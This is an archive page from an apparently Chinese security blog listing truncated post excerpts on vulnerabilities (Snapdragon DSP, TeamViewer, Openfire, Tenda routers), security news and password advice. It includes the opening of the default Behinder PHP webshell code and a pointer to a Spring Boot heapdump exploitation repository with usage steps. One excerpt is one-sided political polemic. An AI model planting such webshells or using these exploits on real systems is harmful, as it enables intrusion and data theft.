2020年08月的文章 第5页

漏洞概述 Check Point 安全研究人员Slava Makkaveev发现了高通Snapdragon芯片数字信号处理（DSP）的多个安全漏洞，攻击者利用这些漏洞可以在无需用户交互的情况下控制超过40%的智能手机、监听用户、并在绕过检测...

赞(0)微慑管理员2020-08-11业界快讯 阅读(2338)去评论

2020年8月9日，一手Video 消息，近日在山东济南，21岁的小伙王某某三次购买网络攻击的工具，并利用其工具致40多家网吧网络瘫痪，频繁掉线。   随后，这位男子在当地被公安机关逮捕。只是这个男子的动机，着实让一众网友无语，其自称到，这...

赞(0)微慑管理员2020-08-11案例分析 阅读(2093)去评论

近日，TeamViewer 官方发布了 TeamViewer 用户密码破解漏洞 的风险通告，漏洞概况如下： CVE编号 CVE-2020-13699 风险等级 高危 利用条件 访问攻击者精心构造的恶意页面 漏洞详情 TeamViewer是一...

赞(0)微慑管理员2020-08-10Application 阅读(3362)去评论

  0x01 简介 Openfire（以前称为Wildfire和Jive Messenger）是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序，将其自身定位为中型企业控制内部通信并简化即时消...

赞(0)微慑管理员2020-08-10Application 阅读(9420)去评论

 漏洞简介:  腾达(Tenda) AC 系列是由腾达发布的针对家庭用户的无线路由器，市场占用率比较高，为综合类别较全的家庭无线路由器。 腾达(Tenda) AC 提供Web服务组件中的goform插件存在一个设计缺陷，权限验证不严格，可在...

赞(0)微慑管理员2020-08-10Hardware 阅读(3900)去评论

《记录下》 针对建议： （1）使用多种字符组合的强密码，如大小写字母+数字+特殊字符； （2）用户密码中不要出现与用户名或者系统名相关的字符，如用户名@123、系统名123等； （3）不要使用系统默认初始密码；或设定在系统首次登录时，强制修...

赞(0)微慑管理员2020-08-10学习路上 阅读(4622)去评论

果然是满嘴道德仁义，一肚子见不得人的“猫腻”。 近日，美国频频借国家安全、信息泄露之名，行打压中国科技企业之实。谁想这贼喊捉贼的旧把戏，却因为一家背景非常特殊的美国小公司，彻底暴露了。 当地时间8月7日，《华尔街日报》报道称，一家与美国国防...

赞(0)微慑管理员2020-08-09业界快讯 阅读(1947)去评论

2020年8月7日消息，据外媒报道，一名黑客周四公布了从英特尔窃取的20GB绝密芯片工程数据，这些数据可能会给多个平台的用户带来新的“零日漏洞”攻击威胁。 黑客链接到加密信息平台Telegram上的一篇帖子详细说明了窃取的内容，并在底部附上...

赞(0)微慑管理员2020-08-08业界快讯 阅读(2775)去评论

https://github.com/LandGrey/SpringBootVulExploit 利用条件： 可正常 GET 请求目标 /heapdump 或 /actuator/heapdump 接口 利用方法： 步骤一： 找到想要获取的...

赞(0)微慑管理员2020-08-07学习路上 阅读(12487)去评论

冰蝎默认php木马： <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr(md5(uniqid(rand())),16...

赞(0)微慑管理员2020-08-05学习路上 阅读(7689)去评论